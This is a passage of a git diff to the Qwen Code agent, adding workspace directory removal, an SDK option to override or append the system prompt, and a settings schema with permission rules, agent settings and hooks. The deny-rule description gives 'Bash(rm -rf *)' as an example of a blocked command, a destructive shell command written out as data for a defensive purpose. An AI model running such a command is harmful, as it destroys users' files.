expect(ctx.getDirectories()).not.toContain(addedDir); + }); + + it('should return false for non-existent directory', () => { + const ctx = new WorkspaceContext(cwd); + const result = ctx.removeDirectory('/non/existent/path'); + expect(result).toBe(false); + }); + + it('should notify listeners when a directory is removed', () => { + const ctx = new WorkspaceContext(cwd); + ctx.addDirectory(addedDir); + + const listener = vi.fn(); + ctx.onDirectoriesChanged(listener); + + ctx.removeDirectory(addedDir); + expect(listener).toHaveBeenCalledOnce(); + }); + + it('should not notify listeners when removal fails', () => { + const ctx = new WorkspaceContext(cwd); + + const listener = vi.fn(); + ctx.onDirectoriesChanged(listener); + + ctx.removeDirectory(addedDir); // not in workspace + expect(listener).not.toHaveBeenCalled(); + }); +}); + +describe('WorkspaceContext isInitialDirectory', () => { + let tempDir: string; + let cwd: string; + let additionalDir: string; + let runtimeDir: string; + + beforeEach(() => { + tempDir = fs.realpathSync( + fs.mkdtempSync(path.join(os.tmpdir(), 'workspace-context-initial-')), + ); + cwd = path.join(tempDir, 'project'); + additionalDir = path.join(tempDir, 'additional'); + runtimeDir = path.join(tempDir, 'runtime'); + + fs.mkdirSync(cwd, { recursive: true }); + fs.mkdirSync(additionalDir, { recursive: true }); + fs.mkdirSync(runtimeDir, { recursive: true }); + }); + + afterEach(() => { + fs.rmSync(tempDir, { recursive: true, force: true }); + }); + + it('should return true for the initial cwd directory', () => { + const ctx = new WorkspaceContext(cwd); + expect(ctx.isInitialDirectory(cwd)).toBe(true); + }); + + it('should return false for an additional directory passed at construction', () => { + const ctx = new WorkspaceContext(cwd, [additionalDir]); + // additionalDirectories are no longer considered 'initial' + expect(ctx.isInitialDirectory(additionalDir)).toBe(false); + }); + + it('should return false for a runtime-added directory', () => { + const ctx = new WorkspaceContext(cwd); + ctx.addDirectory(runtimeDir); + expect(ctx.isInitialDirectory(runtimeDir)).toBe(false); + }); + + it('should return false for a directory not in the workspace', () => { + const ctx = new WorkspaceContext(cwd); + expect(ctx.isInitialDirectory('/some/random/path')).toBe(false); + }); +}); diff --git a/packages/core/src/utils/workspaceContext.ts b/packages/core/src/utils/workspaceContext.ts index 1b36f3650..5f052100d 100755 --- a/packages/core/src/utils/workspaceContext.ts +++ b/packages/core/src/utils/workspaceContext.ts @@ -31,10 +31,13 @@ export class WorkspaceContext { */ constructor(directory: string, additionalDirectories: string[] = []) { this.addDirectory(directory); + // Snapshot only the primary working directory as "initial" (non-removable). + // Additional directories (from settings / CLI flags) are added after + // the snapshot so they remain removable by the user. + this.initialDirectories = new Set(this.directories); for (const additionalDirectory of additionalDirectories) { this.addDirectory(additionalDirectory); } - this.initialDirectories = new Set(this.directories); } /** @@ -112,6 +115,53 @@ export class WorkspaceContext { return Array.from(this.initialDirectories); } + /** + * Removes a directory from the workspace. + * Cannot remove initial directories (those set at construction time). + * @param directory The directory path to remove + * @returns True if the directory was removed, false if not found or is an initial directory + */ + removeDirectory(directory: string): boolean { + // Resolve to match the stored form + let resolved: string; + try { + resolved = this.resolveAndValidateDir(directory); + } catch { + // If we can't resolve it, try matching by raw string (e.g. directory was deleted) + resolved = path.isAbsolute(directory) + ? directory + : path.resolve(process.cwd(), directory); + } + + if (this.initialDirectories.has(resolved)) { + debugLogger.warn(`Cannot remove initial directory: ${resolved}`); + return false; + } + + if (!this.directories.has(resolved)) { + return false; + } + + this.directories.delete(resolved); + this.notifyDirectoriesChanged(); + return true; + } + + /** + * Checks whether a directory is an initial (non-removable) directory. + */ + isInitialDirectory(directory: string): boolean { + try { + const resolved = this.resolveAndValidateDir(directory); + return this.initialDirectories.has(resolved); + } catch { + const absolutePath = path.isAbsolute(directory) + ? directory + : path.resolve(process.cwd(), directory); + return this.initialDirectories.has(absolutePath); + } + } + setDirectories(directories: readonly string[]): void { const newDirectories = new Set(); for (const dir of directories) { diff --git a/packages/core/vendor/tree-sitter/tree-sitter-bash.wasm b/packages/core/vendor/tree-sitter/tree-sitter-bash.wasm new file mode 100755 index 000000000..214d0a73a Binary files /dev/null and b/packages/core/vendor/tree-sitter/tree-sitter-bash.wasm differ diff --git a/packages/core/vendor/tree-sitter/tree-sitter.wasm b/packages/core/vendor/tree-sitter/tree-sitter.wasm new file mode 100755 index 000000000..8f6156796 Binary files /dev/null and b/packages/core/vendor/tree-sitter/tree-sitter.wasm differ diff --git a/packages/sdk-typescript/README.md b/packages/sdk-typescript/README.md index 292a7550a..96e5db072 100644 --- a/packages/sdk-typescript/README.md +++ b/packages/sdk-typescript/README.md @@ -60,6 +60,7 @@ Creates a new query session with the Qwen Code. | `permissionMode` | `'default' \| 'plan' \| 'auto-edit' \| 'yolo'` | `'default'` | Permission mode controlling tool execution approval. See [Permission Modes](#permission-modes) for details. | | `canUseTool` | `CanUseTool` | - | Custom permission handler for tool execution approval. Invoked when a tool requires confirmation. Must respond within 60 seconds or the request will be auto-denied. See [Custom Permission Handler](#custom-permission-handler). | | `env` | `Record` | - | Environment variables to pass to the Qwen Code process. Merged with the current process environment. | +| `systemPrompt` | `string \| QuerySystemPromptPreset` | - | System prompt configuration for the main session. Use a string to fully override the built-in Qwen Code system prompt, or a preset object to keep the built-in prompt and append extra instructions. | | `mcpServers` | `Record` | - | MCP (Model Context Protocol) servers to connect. Supports external servers (stdio/SSE/HTTP) and SDK-embedded servers. External servers are configured with transport options like `command`, `args`, `url`, `httpUrl`, etc. SDK servers use `{ type: 'sdk', name: string, instance: Server }`. | | `abortController` | `AbortController` | - | Controller to cancel the query session. Call `abortController.abort()` to terminate the session and cleanup resources. | | `debug` | `boolean` | `false` | Enable debug mode for verbose logging from the CLI process. | @@ -247,6 +248,36 @@ const result = query({ }); ``` +### Override the System Prompt + +```typescript +import { query } from '@qwen-code/sdk'; + +const result = query({ + prompt: 'Say hello in one sentence.', + options: { + systemPrompt: 'You are a terse assistant. Answer in exactly one sentence.', + }, +}); +``` + +### Append to the Built-in System Prompt + +```typescript +import { query } from '@qwen-code/sdk'; + +const result = query({ + prompt: 'Review the current directory.', + options: { + systemPrompt: { + type: 'preset', + preset: 'qwen_code', + append: 'Be terse and focus on concrete findings.', + }, + }, +}); +``` + ### With SDK-Embedded MCP Servers The SDK provides `tool` and `createSdkMcpServer` to create MCP servers that run in the same process as your SDK application. This is useful when you want to expose custom tools to the AI without running a separate server process. diff --git a/packages/sdk-typescript/src/index.ts b/packages/sdk-typescript/src/index.ts index 4ae465975..805d03cfb 100644 --- a/packages/sdk-typescript/src/index.ts +++ b/packages/sdk-typescript/src/index.ts @@ -55,6 +55,8 @@ export type { PermissionMode, CanUseTool, PermissionResult, + QuerySystemPrompt, + QuerySystemPromptPreset, CLIMcpServerConfig, McpServerConfig, McpOAuthConfig, diff --git a/packages/sdk-typescript/src/query/createQuery.ts b/packages/sdk-typescript/src/query/createQuery.ts index 5ffcd1dda..42d332b15 100644 --- a/packages/sdk-typescript/src/query/createQuery.ts +++ b/packages/sdk-typescript/src/query/createQuery.ts @@ -7,7 +7,11 @@ import { serializeJsonLine } from '../utils/jsonLines.js'; import { ProcessTransport } from '../transport/ProcessTransport.js'; import { prepareSpawnInfo, type SpawnInfo } from '../utils/cliPath.js'; import { Query } from './Query.js'; -import type { QueryOptions } from '../types/types.js'; +import type { + QueryOptions, + QuerySystemPrompt, + TransportOptions, +} from '../types/types.js'; import { QueryOptionsSchema } from '../types/queryOptionsSchema.js'; import { SdkLogger } from '../utils/logger.js'; import { randomUUID } from 'node:crypto'; @@ -44,6 +48,7 @@ export function query({ // Generate or use provided session ID for SDK-CLI alignment const sessionId = options.resume ?? options.sessionId ?? randomUUID(); + const resolvedSystemPrompt = resolveSystemPromptOption(options.systemPrompt); const transport = new ProcessTransport({ pathToQwenExecutable, @@ -52,6 +57,7 @@ export function query({ model: options.model, permissionMode: options.permissionMode, env: options.env, + ...resolvedSystemPrompt, abortController, debug: options.debug, stderr: options.stderr, @@ -112,6 +118,20 @@ export function query({ return queryInstance; } +function resolveSystemPromptOption( + systemPrompt: QuerySystemPrompt | undefined, +): Pick { + if (!systemPrompt) { + return {}; + } + + if (typeof systemPrompt === 'string') { + return { systemPrompt }; + } + + return systemPrompt.append ? { appendSystemPrompt: systemPrompt.append } : {}; +} + function validateOptions(options: QueryOptions): SpawnInfo | undefined { const validationResult = QueryOptionsSchema.safeParse(options); if (!validationResult.success) { diff --git a/packages/sdk-typescript/src/transport/ProcessTransport.ts b/packages/sdk-typescript/src/transport/ProcessTransport.ts index a763a519c..fa55d0327 100644 --- a/packages/sdk-typescript/src/transport/ProcessTransport.ts +++ b/packages/sdk-typescript/src/transport/ProcessTransport.ts @@ -232,6 +232,14 @@ export class ProcessTransport implements Transport { args.push('--model', this.options.model); } + if (this.options.systemPrompt) { + args.push('--system-prompt', this.options.systemPrompt); + } + + if (this.options.appendSystemPrompt) { + args.push('--append-system-prompt', this.options.appendSystemPrompt); + } + if (this.options.permissionMode) { args.push('--approval-mode', this.options.permissionMode); } diff --git a/packages/sdk-typescript/src/types/queryOptionsSchema.ts b/packages/sdk-typescript/src/types/queryOptionsSchema.ts index 6781bb6dc..823bc7085 100644 --- a/packages/sdk-typescript/src/types/queryOptionsSchema.ts +++ b/packages/sdk-typescript/src/types/queryOptionsSchema.ts @@ -123,12 +123,29 @@ export const TimeoutConfigSchema = z.object({ streamClose: z.number().positive().optional(), }); +const QuerySystemPromptPresetSchema = z + .object({ + type: z.literal('preset'), + preset: z.literal('qwen_code'), + append: z + .string() + .min(1, 'systemPrompt.append must be a non-empty string') + .optional(), + }) + .strict(); + export const QueryOptionsSchema = z .object({ cwd: z.string().optional(), model: z.string().optional(), pathToQwenExecutable: z.string().optional(), env: z.record(z.string(), z.string()).optional(), + systemPrompt: z + .union([ + z.string().min(1, 'systemPrompt must be a non-empty string'), + QuerySystemPromptPresetSchema, + ]) + .optional(), permissionMode: z.enum(['default', 'plan', 'auto-edit', 'yolo']).optional(), canUseTool: z .custom((val) => typeof val === 'function', { diff --git a/packages/sdk-typescript/src/types/types.ts b/packages/sdk-typescript/src/types/types.ts index e726f4a2c..b532adc8f 100644 --- a/packages/sdk-typescript/src/types/types.ts +++ b/packages/sdk-typescript/src/types/types.ts @@ -16,6 +16,8 @@ export type TransportOptions = { model?: string; permissionMode?: PermissionMode; env?: Record; + systemPrompt?: string; + appendSystemPrompt?: string; abortController?: AbortController; debug?: boolean; stderr?: (message: string) => void; @@ -46,6 +48,14 @@ export type TransportOptions = { sessionId?: string; }; +export interface QuerySystemPromptPreset { + type: 'preset'; + preset: 'qwen_code'; + append?: string; +} + +export type QuerySystemPrompt = string | QuerySystemPromptPreset; + type ToolInput = Record; export type CanUseTool = ( @@ -226,6 +236,16 @@ export interface QueryOptions { */ env?: Record; + /** + * System prompt configuration for the Qwen CLI session. + * + * - `string`: fully overrides the main session system prompt + * - `{ type: 'preset', preset: 'qwen_code', append?: string }`: + * uses Qwen Code's built-in prompt as the base and optionally appends extra + * instructions for the main session + */ + systemPrompt?: QuerySystemPrompt; + /** * Permission mode controlling how the SDK handles tool execution approval. * diff --git a/packages/sdk-typescript/test/unit/ProcessTransport.test.ts b/packages/sdk-typescript/test/unit/ProcessTransport.test.ts index 327166528..b5e6c19c0 100644 --- a/packages/sdk-typescript/test/unit/ProcessTransport.test.ts +++ b/packages/sdk-typescript/test/unit/ProcessTransport.test.ts @@ -196,6 +196,84 @@ describe('ProcessTransport', () => { ); }); + it('should pass systemPrompt through --system-prompt', () => { + mockPrepareSpawnInfo.mockReturnValue({ + command: 'qwen', + args: [], + type: 'native', + originalInput: 'qwen', + }); + mockSpawn.mockReturnValue(mockChildProcess); + + const options: TransportOptions = { + pathToQwenExecutable: 'qwen', + systemPrompt: 'You are a test system prompt.', + }; + + new ProcessTransport(options); + + expect(mockSpawn).toHaveBeenCalledWith( + 'qwen', + expect.arrayContaining([ + '--system-prompt', + 'You are a test system prompt.', + ]), + expect.any(Object), + ); + }); + + it('should pass appendSystemPrompt through --append-system-prompt', () => { + mockPrepareSpawnInfo.mockReturnValue({ + command: 'qwen', + args: [], + type: 'native', + originalInput: 'qwen', + }); + mockSpawn.mockReturnValue(mockChildProcess); + + const options: TransportOptions = { + pathToQwenExecutable: 'qwen', + appendSystemPrompt: 'Be extra concise.', + }; + + new ProcessTransport(options); + + expect(mockSpawn).toHaveBeenCalledWith( + 'qwen', + expect.arrayContaining(['--append-system-prompt', 'Be extra concise.']), + expect.any(Object), + ); + }); + + it('should pass both systemPrompt and appendSystemPrompt when provided', () => { + mockPrepareSpawnInfo.mockReturnValue({ + command: 'qwen', + args: [], + type: 'native', + originalInput: 'qwen', + }); + mockSpawn.mockReturnValue(mockChildProcess); + + const options: TransportOptions = { + pathToQwenExecutable: 'qwen', + systemPrompt: 'Override prompt', + appendSystemPrompt: 'Append prompt', + }; + + new ProcessTransport(options); + + expect(mockSpawn).toHaveBeenCalledWith( + 'qwen', + expect.arrayContaining([ + '--system-prompt', + 'Override prompt', + '--append-system-prompt', + 'Append prompt', + ]), + expect.any(Object), + ); + }); + it('should include --resume argument when provided', () => { mockPrepareSpawnInfo.mockReturnValue({ command: 'qwen', diff --git a/packages/sdk-typescript/test/unit/createQuery.test.ts b/packages/sdk-typescript/test/unit/createQuery.test.ts new file mode 100644 index 000000000..66b48e938 --- /dev/null +++ b/packages/sdk-typescript/test/unit/createQuery.test.ts @@ -0,0 +1,97 @@ +/** + * Unit tests for query() option mapping + */ + +import { describe, expect, it, vi, beforeEach } from 'vitest'; +import type { QueryOptions } from '../../src/query/createQuery.js'; + +const mockProcessTransport = vi.fn(); +const mockQuery = vi.fn(); +const mockPrepareSpawnInfo = vi.fn(); + +vi.mock('../../src/transport/ProcessTransport.js', () => ({ + ProcessTransport: mockProcessTransport, +})); + +vi.mock('../../src/query/Query.js', () => ({ + Query: mockQuery, +})); + +vi.mock('../../src/utils/cliPath.js', () => ({ + prepareSpawnInfo: mockPrepareSpawnInfo, +})); + +describe('query()', () => { + beforeEach(() => { + vi.clearAllMocks(); + + mockPrepareSpawnInfo.mockReturnValue(undefined); + mockProcessTransport.mockImplementation(() => ({ + write: vi.fn(), + readMessages: vi.fn(), + close: vi.fn(), + waitForExit: vi.fn(), + endInput: vi.fn(), + exitError: null, + })); + mockQuery.mockImplementation(() => ({ + initialized: Promise.resolve(), + getSessionId: () => 'test-session-id', + streamInput: vi.fn(), + })); + }); + + it('maps string systemPrompt to TransportOptions.systemPrompt', async () => { + const { query } = await import('../../src/query/createQuery.js'); + + query({ + prompt: 'hello', + options: { + systemPrompt: 'You are a strict reviewer.', + } satisfies QueryOptions, + }); + + expect(mockProcessTransport).toHaveBeenCalledWith( + expect.objectContaining({ + systemPrompt: 'You are a strict reviewer.', + }), + ); + }); + + it('maps preset systemPrompt append to TransportOptions.appendSystemPrompt', async () => { + const { query } = await import('../../src/query/createQuery.js'); + + query({ + prompt: 'hello', + options: { + systemPrompt: { + type: 'preset', + preset: 'qwen_code', + append: 'Be terse.', + }, + } satisfies QueryOptions, + }); + + const transportOptions = mockProcessTransport.mock.calls[0]?.[0]; + + expect(transportOptions.appendSystemPrompt).toBe('Be terse.'); + expect(transportOptions.systemPrompt).toBeUndefined(); + }); + + it('rejects non-qwen preset names at runtime validation', async () => { + const { query } = await import('../../src/query/createQuery.js'); + + expect(() => + query({ + prompt: 'hello', + options: { + systemPrompt: { + type: 'preset', + preset: 'claude_code', + append: 'Be terse.', + } as never, + } satisfies QueryOptions, + }), + ).toThrow(/systemPrompt/); + }); +}); diff --git a/packages/test-utils/package.json b/packages/test-utils/package.json index eadfec8cc..d4d5c1d85 100644 --- a/packages/test-utils/package.json +++ b/packages/test-utils/package.json @@ -1,6 +1,6 @@ { "name": "@qwen-code/qwen-code-test-utils", - "version": "0.12.3", + "version": "0.13.0", "private": true, "main": "src/index.ts", "license": "Apache-2.0", diff --git a/packages/vscode-ide-companion/README.md b/packages/vscode-ide-companion/README.md index 92eb830a6..3434f3684 100644 --- a/packages/vscode-ide-companion/README.md +++ b/packages/vscode-ide-companion/README.md @@ -63,7 +63,7 @@ We welcome contributions! See our [Contributing Guide](https://github.com/QwenLM ## Terms of Service and Privacy Notice -By installing this extension, you agree to the [Terms of Service](https://github.com/QwenLM/qwen-code/blob/main/docs/tos-privacy.md). +By installing this extension, you agree to the [Terms of Service](https://qwenlm.github.io/qwen-code-docs/en/users/support/tos-privacy/). ## License diff --git a/packages/vscode-ide-companion/package.json b/packages/vscode-ide-companion/package.json index 22f2a2bc5..a7c18ab4b 100644 --- a/packages/vscode-ide-companion/package.json +++ b/packages/vscode-ide-companion/package.json @@ -2,7 +2,7 @@ "name": "qwen-code-vscode-ide-companion", "displayName": "Qwen Code Companion", "description": "Enable Qwen Code with direct access to your VS Code workspace.", - "version": "0.12.3", + "version": "0.13.0", "publisher": "qwenlm", "icon": "assets/icon.png", "repository": { diff --git a/packages/vscode-ide-companion/schemas/settings.schema.json b/packages/vscode-ide-companion/schemas/settings.schema.json index d0eef6ae9..61734faaf 100644 --- a/packages/vscode-ide-companion/schemas/settings.schema.json +++ b/packages/vscode-ide-companion/schemas/settings.schema.json @@ -242,11 +242,6 @@ "type": "number", "default": -1 }, - "summarizeToolOutput": { - "description": "Settings for summarizing tool output.", - "type": "object", - "additionalProperties": true - }, "chatCompression": { "description": "Chat compression settings.", "type": "object", @@ -366,6 +361,33 @@ } } }, + "permissions": { + "description": "Permission rules controlling tool usage. Rules are evaluated in priority order: deny > ask > allow.", + "type": "object", + "properties": { + "allow": { + "description": "Tools or commands that are auto-approved without confirmation. Examples: \"ShellTool\", \"Bash(git *)\", \"ReadFileTool\".", + "type": "array", + "items": { + "type": "string" + } + }, + "ask": { + "description": "Tools or commands that always require user confirmation. Takes precedence over allow rules.", + "type": "array", + "items": { + "type": "string" + } + }, + "deny": { + "description": "Tools or commands that are always blocked. Highest priority rule. Examples: \"ShellTool\", \"Bash(rm -rf *)\".", + "type": "array", + "items": { + "type": "string" + } + } + } + }, "tools": { "description": "Settings for built-in and custom tools.", "type": "object", @@ -397,21 +419,21 @@ } }, "core": { - "description": "Paths to core tool definitions.", + "description": "Deprecated. Use permissions.allow instead.", "type": "array", "items": { "type": "string" } }, "allowed": { - "description": "A list of tool names that will bypass the confirmation dialog.", + "description": "Deprecated. Use permissions.allow instead.", "type": "array", "items": { "type": "string" } }, "exclude": { - "description": "Tool names to exclude from discovery.", + "description": "Deprecated. Use permissions.deny instead.", "type": "array", "items": { "type": "string" @@ -450,11 +472,6 @@ "type": "boolean", "default": true }, - "enableToolOutputTruncation": { - "description": "Enable truncation of large tool outputs.", - "type": "boolean", - "default": true - }, "truncateToolOutputThreshold": { "description": "Truncate tool output if it is larger than this many characters. Set to -1 to disable.", "type": "number", @@ -574,6 +591,51 @@ "type": "object", "additionalProperties": true }, + "agents": { + "description": "Settings for multi-agent collaboration features (Arena, Team, Swarm).", + "type": "object", + "properties": { + "displayMode": { + "description": "Display mode for multi-agent sessions. Currently only \"in-process\" is supported. Options: in-process", + "enum": [ + "in-process" + ] + }, + "arena": { + "description": "Settings for Arena (multi-model competitive execution).", + "type": "object", + "properties": { + "worktreeBaseDir": { + "description": "Custom base directory for Arena worktrees. Defaults to ~/.qwen/arena.", + "type": "string" + }, + "preserveArtifacts": { + "description": "When enabled, Arena worktrees and session state files are preserved after the session ends or the main agent exits.", + "type": "boolean", + "default": false + }, + "maxRoundsPerAgent": { + "description": "Maximum number of rounds (turns) each agent can execute. No limit if unset.", + "type": "number" + }, + "timeoutSeconds": { + "description": "Total timeout in seconds for the Arena session. No limit if unset.", + "type": "number" + } + } + }, + "team": { + "description": "Settings for Agent Team (role-based collaborative execution). Reserved for future use.", + "type": "object", + "additionalProperties": true + }, + "swarm": { + "description": "Settings for Agent Swarm (parallel sub-agent execution). Reserved for future use.", + "type": "object", + "additionalProperties": true + } + } + }, "hooksConfig": { "description": "Hook configurations for intercepting and customizing agent behavior.", "type": "object", @@ -600,18 +662,209 @@ "description": "Hooks that execute before agent processing. Can modify prompts or inject context.", "type": "array", "items": { - "type": "string" + "description": "A hook definition with an optional matcher and a list of hook configurations.", + "type": "object", + "properties": { + "matcher": { + "description": "An optional matcher pattern to filter when this hook definition applies.", + "type": "string" + }, + "sequential": { + "description": "Whether the hooks should be executed sequentially instead of in parallel.", + "type": "boolean" + }, + "hooks": { + "description": "The list of hook configurations to execute.", + "type": "array", + "items": { + "description": "A hook configuration entry that defines a command to execute.", + "type": "object", + "properties": { + "type": { + "description": "The type of hook.", + "type": "string", + "enum": [ + "command" + ] + }, + "command": { + "description": "The command to execute when the hook is triggered.", + "type": "string" + }, + "name": { + "description": "An optional name for the hook.", + "type": "string" + }, + "description": { + "description": "An optional description of what the hook does.", + "type": "string" + }, + "timeout": { + "description": "Timeout in milliseconds for the hook execution.", + "type": "number" + }, + "env": { + "description": "Environment variables to set when executing the hook command.", + "type": "object", + "additionalProperties": { + "type": "string" + } + } + }, + "required": [ + "type", + "command" + ] + } + } + }, + "required": [ + "hooks" + ] } }, "Stop": { "description": "Hooks that execute after agent processing. Can post-process responses or log interactions.", "type": "array", + "items": { + "description": "A hook definition with an optional matcher and a list of hook configurations.", + "type": "object", + "properties": { + "matcher": { + "description": "An optional matcher pattern to filter when this hook definition applies.", + "type": "string" + }, + "sequential": { + "description": "Whether the hooks should be executed sequentially instead of in parallel.", + "type": "boolean" + }, + "hooks": { + "description": "The list of hook configurations to execute.", + "type": "array", + "items": { + "description": "A hook configuration entry that defines a command to execute.", + "type": "object", + "properties": { + "type": { + "description": "The type of hook.", + "type": "string", + "enum": [ + "command" + ] + }, + "command": { + "description": "The command to execute when the hook is triggered.", + "type": "string" + }, + "name": { + "description": "An optional name for the hook.", + "type": "string" + }, + "description": { + "description": "An optional description of what the hook does.", + "type": "string" + }, + "timeout": { + "description": "Timeout in milliseconds for the hook execution.", + "type": "number" + }, + "env": { + "description": "Environment variables to set when executing the hook command.", + "type": "object", + "additionalProperties": { + "type": "string" + } + } + }, + "required": [ + "type", + "command" + ] + } + } + }, + "required": [ + "hooks" + ] + } + }, + "Notification": { + "description": "Hooks that execute when notifications are sent.", + "type": "array", + "items": { + "type": "string" + } + }, + "PreToolUse": { + "description": "Hooks that execute before tool execution.", + "type": "array", + "items": { + "type": "string" + } + }, + "PostToolUse": { + "description": "Hooks that execute after successful tool execution.", + "type": "array", + "items": { + "type": "string" + } + }, + "PostToolUseFailure": { + "description": "Hooks that execute when tool execution fails. ", + "type": "array", + "items": { + "type": "string" + } + }, + "SessionStart": { + "description": "Hooks that execute when a new session starts or resumes.", + "type": "array", + "items": { + "type": "string" + } + }, + "SessionEnd": { + "description": "Hooks that execute when a session ends.", + "type": "array", + "items": { + "type": "string" + } + }, + "PreCompact": { + "description": "Hooks that execute before conversation compaction.", + "type": "array", + "items": { + "type": "string" + } + }, + "SubagentStart": { + "description": "Hooks that execute when a subagent (Task tool call) is started.", + "type": "array", + "items": { + "type": "string" + } + }, + "SubagentStop": { + "description": "Hooks that execute right before a subagent (Task tool call) concludes its response.", + "type": "array", + "items": { + "type": "string" + } + }, + "PermissionRequest": { + "description": "Hooks that execute when a permission dialog is displayed.", + "type": "array", "items": { "type": "string" } } } }, + "experimental": { + "description": "Setting to enable experimental features", + "type": "object", + "properties": {} + }, "$version": { "type": "number", "description": "Settings schema version for migration tracking.", diff --git a/packages/vscode-ide-companion/src/diff-manager.ts b/packages/vscode-ide-companion/src/diff-manager.ts index 9a32769c1..8367517ab 100644 --- a/packages/vscode-ide-companion/src/diff-manager.ts +++ b/packages/vscode-ide-companion/src/diff-manager.ts @@ -192,17 +192,17 @@ export class DiffManager { return; } // Left side: old content using qwen-diff scheme - const leftDocUri = vscode.Uri.from({ + // Use Uri.file() to properly handle Windows paths (e.g., C:\Users\...) + // then change the scheme to our custom diff scheme + const leftDocUri = vscode.Uri.file(normalizedPath).with({ scheme: DIFF_SCHEME, - path: normalizedPath, query: `old&rand=${Math.random()}`, }); this.diffContentProvider.setContent(leftDocUri, oldContent); // Right side: new content using qwen-diff scheme - const rightDocUri = vscode.Uri.from({ + const rightDocUri = vscode.Uri.file(normalizedPath).with({ scheme: DIFF_SCHEME, - path: normalizedPath, query: `new&rand=${Math.random()}`, }); this.diffContentProvider.setContent(rightDocUri, newContent); diff --git a/packages/vscode-ide-companion/src/webview/App.tsx b/packages/vscode-ide-companion/src/webview/App.tsx index 56b81d98c..c569c1557 100644 --- a/packages/vscode-ide-companion/src/webview/App.tsx +++ b/packages/vscode-ide-companion/src/webview/App.tsx @@ -134,18 +134,11 @@ export const App: React.FC = () => { }), ); - if (query && query.length >= 1) { - const lowerQuery = query.toLowerCase(); - return allItems.filter( - (item) => - item.label.toLowerCase().includes(lowerQuery) || - (item.description && - item.description.toLowerCase().includes(lowerQuery)), - ); - } + // Fuzzy search is handled by the backend (FileSearchFactory) + // No client-side filtering needed - results are already fuzzy-matched // If first time and still loading, show a placeholder - if (allItems.length === 0) { + if (allItems.length === 0 && query && query.length >= 1) { return [ { id: 'loading-files', @@ -189,6 +182,7 @@ export const App: React.FC = () => { description: cmd.description, type: 'command' as const, group: 'Slash Commands', + value: cmd.name, }), ); @@ -307,22 +301,24 @@ export const App: React.FC = () => { // Emit a cancel to the extension and immediately reflect interruption locally. const handleCancel = useCallback(() => { if (messageHandling.isStreaming || messageHandling.isWaitingForResponse) { - // Proactively end local states and add an 'Interrupted' line - try { - messageHandling.endStreaming?.(); - } catch { - /* no-op */ + // End streaming state and add an 'Interrupted' line. + // IMPORTANT: Do NOT clear isWaitingForResponse here — let the + // extension's streamEnd message clear it after the cancel is + // properly processed on the backend. This keeps the submit + // guard active and prevents any cached input from being + // auto-submitted during the cancel → confirmed window. + if (messageHandling.isStreaming) { + try { + messageHandling.endStreaming?.(); + } catch { + /* no-op */ + } + messageHandling.addMessage({ + role: 'assistant', + content: 'Interrupted', + timestamp: Date.now(), + }); } - try { - messageHandling.clearWaitingForResponse?.(); - } catch { - /* no-op */ - } - messageHandling.addMessage({ - role: 'assistant', - content: 'Interrupted', - timestamp: Date.now(), - }); } // Notify extension/agent to cancel server-side work vscode.postMessage({ @@ -516,9 +512,11 @@ export const App: React.FC = () => { setAskUserQuestionRequest(null); }, [vscode]); - // Handle completion selection + // Handle completion selection. + // When fillOnly is true (Tab), slash commands are inserted into the input + // instead of being sent immediately, so users can append arguments. const handleCompletionSelect = useCallback( - (item: CompletionItem) => { + (item: CompletionItem, fillOnly?: boolean) => { // Handle completion selection by inserting the value into the input field const inputElement = inputFieldRef.current; if (!inputElement) { @@ -591,13 +589,13 @@ export const App: React.FC = () => { } }; - // Handle special commands by id if (itemId === 'login') { clearTriggerText(); vscode.postMessage({ type: 'login', data: {} }); completion.closeCompletion(); return; } + if (itemId === 'model') { clearTriggerText(); setShowModelSelector(true); @@ -605,10 +603,11 @@ export const App: React.FC = () => { return; } - // Handle server-provided slash commands by sending them as messages - // CLI will detect slash commands in session/prompt and execute them + // Handle server-provided slash commands by sending them as messages. + // Skip when fillOnly (Tab) — let the generic insertion path fill the + // command text so the user can keep typing arguments. const serverCmd = availableCommands.find((c) => c.name === itemId); - if (serverCmd) { + if (serverCmd && !fillOnly) { // Clear the trigger text since we're sending the command clearTriggerText(); // Send the slash command as a user message @@ -676,7 +675,9 @@ export const App: React.FC = () => { // Replace from trigger to cursor with selected value const textBeforeCursor = text.substring(0, cursorPos); const atPos = textBeforeCursor.lastIndexOf('@'); - const slashPos = textBeforeCursor.lastIndexOf('/'); + // Only consider slash as trigger if we're in slash command mode + const slashPos = + completion.triggerChar === '/' ? textBeforeCursor.lastIndexOf('/') : -1; const triggerPos = Math.max(atPos, slashPos); if (triggerPos >= 0) { @@ -1029,6 +1030,7 @@ export const App: React.FC = () => { completionIsOpen={completion.isOpen} completionItems={completion.items} onCompletionSelect={handleCompletionSelect} + onCompletionFill={(item) => handleCompletionSelect(item, true)} onCompletionClose={completion.closeCompletion} showModelSelector={showModelSelector} availableModels={availableModels} diff --git a/packages/vscode-ide-companion/src/webview/components/layout/InputForm.test.tsx b/packages/vscode-ide-companion/src/webview/components/layout/InputForm.test.tsx new file mode 100644 index 000000000..8bf5ea26f --- /dev/null +++ b/packages/vscode-ide-companion/src/webview/components/layout/InputForm.test.tsx @@ -0,0 +1,155 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** @vitest-environment jsdom */ + +import type React from 'react'; +import { act, createRef } from 'react'; +import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'; +import { createRoot, type Root } from 'react-dom/client'; +import { ApprovalMode } from '../../../types/acpTypes.js'; +import type { CompletionItem } from '../../../types/completionItemTypes.js'; +import { InputForm } from './InputForm.js'; + +vi.mock('@qwen-code/webui', async () => { + const actual = await vi.importActual( + '../../../../../webui/src/components/layout/InputForm.tsx', + ); + + return { + InputForm: actual.InputForm, + getEditModeIcon: actual.getEditModeIcon, + }; +}); + +const completionItem: CompletionItem = { + id: 'create-issue', + label: '/create-issue', + type: 'command', + value: 'create-issue', +}; + +function renderInputForm(props?: { + onCompletionSelect?: (item: CompletionItem) => void; + onCompletionFill?: (item: CompletionItem) => void; +}) { + const container = document.createElement('div'); + document.body.appendChild(container); + + const root = createRoot(container); + const inputFieldRef = + createRef() as unknown as React.RefObject; + const onCompletionSelect = props?.onCompletionSelect ?? vi.fn(); + const onCompletionFill = props?.onCompletionFill ?? vi.fn(); + + act(() => { + root.render( + , + ); + }); + + return { + container, + root, + onCompletionSelect, + onCompletionFill, + }; +} + +describe('InputForm completion keyboard handling', () => { + let root: Root | null = null; + let container: HTMLDivElement | null = null; + + beforeEach(() => { + vi.clearAllMocks(); + ( + globalThis as typeof globalThis & { IS_REACT_ACT_ENVIRONMENT?: boolean } + 